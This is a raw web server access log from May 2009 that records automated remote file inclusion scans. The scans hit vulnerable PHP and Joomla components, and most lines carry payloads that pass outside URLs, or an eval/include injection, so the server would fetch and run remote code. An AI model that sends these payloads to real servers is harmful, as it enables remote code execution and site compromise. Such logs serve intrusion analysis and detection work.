72.52.230.168 - - [16/May/2009:02:50:54 -0400] "GET /logs/access_log.Q109041200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:50:55 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:51:04 -0400] "GET /logs/access_log.Q108120100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.121.210.42 - - [16/May/2009:02:51:06 -0400] "GET /?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.210.42 - - [16/May/2009:02:51:06 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [16/May/2009:02:51:06 -0400] "GET /logs/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 1552 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:02:51:11 -0400] "GET /logs/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 1552 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:02:51:11 -0400] "GET /?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:02:51:12 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [16/May/2009:02:51:12 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:02:51:21 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:02:51:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.52.164.18 - - [16/May/2009:02:51:36 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
171.64.75.45 - - [16/May/2009:02:51:38 -0400] "GET /logs/access_log.Q108082900//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.52.164.18 - - [16/May/2009:02:51:39 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
208.112.87.9 - - [16/May/2009:02:52:18 -0400] "GET /logs/access_log.Q108100700/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
208.112.87.9 - - [16/May/2009:02:52:18 -0400] "GET /http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
208.112.87.9 - - [16/May/2009:02:52:18 -0400] "GET /logs/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
208.112.87.9 - - [16/May/2009:02:52:23 -0400] "GET /logs/access_log.Q108112400/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
121.254.229.131 - - [16/May/2009:02:52:26 -0400] "GET /logs/access_log.Q109042500%20%20//imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:52:31 -0400] "GET /logs/access_log.Q109042500%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
91.121.210.42 - - [16/May/2009:02:52:34 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.210.42 - - [16/May/2009:02:52:38 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:53:12 -0400] "GET /logs/error_log.Q108081600%20%20//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:53:13 -0400] "GET /logs/error_log.Q108081600%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:53:33 -0400] "GET /logs/error_log.Q108120400%20%20//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:53:34 -0400] "GET /logs/access_log.Q109041200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:53:37 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:02:53:37 -0400] "GET /logs/error_log.Q108120400%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:53:37 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:53:37 -0400] "GET /logs/access_log.Q109041200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:53:38 -0400] "GET /logs/access_log.Q108120100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:02:53:46 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.3.226.56 - - [16/May/2009:02:54:07 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:54:13 -0400] "GET /logs/access_log.Q108120100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
208.112.87.9 - - [16/May/2009:02:54:18 -0400] "GET /http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
171.64.75.45 - - [16/May/2009:02:54:19 -0400] "GET /logs/access_log.Q108082900//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:02:54:29 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:02:54:29 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:02:54:29 -0400] "GET /logs/access_log.Q108012500//modules/vwar/admin/admin.php?vwar_root=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:02:54:34 -0400] "GET /logs/access_log.Q108122100//modules/vwar/admin/admin.php?vwar_root=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:02:55:01 -0400] "GET /logs/access_log.Q109051200//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:55:17 -0400] "GET /logs/access_log.Q108082900//imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.149.235.45 - - [16/May/2009:02:55:22 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.149.235.45 - - [16/May/2009:02:55:22 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.103.72.130 - - [16/May/2009:02:55:29 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.103.72.130 - - [16/May/2009:02:55:30 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.227.114.171 - - [16/May/2009:02:55:54 -0400] "GET /logs/access_log.Q108091300/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
212.227.114.171 - - [16/May/2009:02:55:54 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
212.227.114.171 - - [16/May/2009:02:55:55 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
89.149.235.45 - - [16/May/2009:02:56:04 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
89.149.235.45 - - [16/May/2009:02:56:05 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.810"
89.149.235.45 - - [16/May/2009:02:56:05 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.810"
69.94.30.156 - - [16/May/2009:02:56:08 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:02:56:08 -0400] "GET /logs/errors.php?error=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:02:56:08 -0400] "GET /errors.php?error=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:02:56:13 -0400] "GET /logs/access_log.Q108101700/errors.php?error=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:02:56:21 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.214.86.93 - - [16/May/2009:02:56:21 -0400] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:56:21 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:56:21 -0400] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:02:56:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
163.20.116.193 - - [16/May/2009:02:56:25 -0400] "GET /logs/access_log.Q108092700//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:02:56:25 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.214.86.93 - - [16/May/2009:02:56:29 -0400] "GET /logs/access_log.Q108101700/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:56:32 -0400] "GET /logs/access_log.Q109012300//?_zb_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:02:56:32 -0400] "GET //?_zb_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:02:56:32 -0400] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 200 1557 "-" "libwww-perl/5.813"
163.20.116.193 - - [16/May/2009:02:56:35 -0400] "GET /logs/access_log.Q108090200//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.85.249.226 - - [16/May/2009:02:56:47 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
70.85.249.226 - - [16/May/2009:02:56:47 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
70.85.249.226 - - [16/May/2009:02:56:52 -0400] "GET /logs/access_log.Q108081600//imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.85.249.226 - - [16/May/2009:02:56:54 -0400] "GET //imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.85.249.226 - - [16/May/2009:02:56:54 -0400] "GET /logs//imgcaptcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
70.85.249.226 - - [16/May/2009:02:57:03 -0400] "GET /logs/access_log.Q108081600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
121.254.229.131 - - [16/May/2009:02:57:52 -0400] "GET /logs/access_log.Q108082900//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:02:57:58 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
217.147.29.190 - - [16/May/2009:02:58:01 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.808"
217.147.29.190 - - [16/May/2009:02:58:01 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.808"
89.149.235.45 - - [16/May/2009:02:58:18 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
62.44.79.35 - - [16/May/2009:02:58:42 -0400] "GET /logs/access_log.Q108012500%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:02:58:47 -0400] "GET /logs/error_log.Q108081200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.149.235.45 - - [16/May/2009:02:58:54 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.810"
121.254.229.131 - - [16/May/2009:02:58:56 -0400] "GET /logs/access_log.Q109051200//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:59:03 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:59:03 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:59:03 -0400] "GET /logs/access_log.Q109041200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:59:17 -0400] "GET /logs/access_log.Q108120100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:59:19 -0400] "GET /logs/access_log.Q108081600%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:59:21 -0400] "GET /logs/access_log.Q108101700%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:59:51 -0400] "GET /logs/access_log.Q108081000%20%20/joomla/index.php?option=com_restaurante&task=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:59:52 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:59:52 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
83.103.72.130 - - [16/May/2009:02:59:59 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
217.147.29.190 - - [16/May/2009:03:00:16 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.808"
200.107.138.34 - - [16/May/2009:03:00:36 -0400] "GET /logs/access_log.Q108090900/index.php?pagina=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.107.138.34 - - [16/May/2009:03:00:37 -0400] "GET /index.php?pagina=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
200.107.138.34 - - [16/May/2009:03:00:37 -0400] "GET /logs/index.php?pagina=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
69.94.30.156 - - [16/May/2009:03:01:01 -0400] "GET /logs/access_log.Q108081600%20%20/errors.php?error=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:01:01 -0400] "GET /logs/access_log.Q108101700%20%20/errors.php?error=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:03:01:11 -0400] "GET /?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:03:01:11 -0400] "GET /logs/?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 200 1552 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:03:01:11 -0400] "GET /logs/access_log.Q108082800/?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:03:01:14 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
87.230.85.142 - - [16/May/2009:03:01:22 -0400] "GET /logs/access_log.Q108122100%20%20//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.230.85.142 - - [16/May/2009:03:01:22 -0400] "GET //index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
87.230.85.142 - - [16/May/2009:03:01:22 -0400] "GET /logs//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.107.138.34 - - [16/May/2009:03:01:25 -0400] "GET /logs/access_log.Q108120300/index.php?pagina=http://treffuns.de//img/icons/tabs/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.150.79.146 - - [16/May/2009:03:01:26 -0400] "GET /logs/access_log.Q108081800/joomla/index.php?option=com_restaurante&task=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:03:01:26 -0400] "GET /logs/access_log.Q108062000/joomla/index.php?option=com_restaurante&task=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:01:36 -0400] "GET /logs/access_log.Q108122100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:03:01:36 -0400] "GET /logs/access_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:01:37 -0400] "GET /logs/access_log.Q108102500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:01:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.85.142 - - [16/May/2009:03:01:44 -0400] "GET //index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
87.230.85.142 - - [16/May/2009:03:01:44 -0400] "GET /logs/access_log.Q108122100%20%20//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.230.85.142 - - [16/May/2009:03:01:44 -0400] "GET /logs//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
91.184.52.8 - - [16/May/2009:03:01:49 -0400] "GET //index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
91.184.52.8 - - [16/May/2009:03:01:49 -0400] "GET /logs/access_log.Q108122100%20%20//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.184.52.8 - - [16/May/2009:03:01:49 -0400] "GET /logs//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://livesexgirls.com/cache/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:03:02:03 -0400] "GET /logs/access_log.Q108082900//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
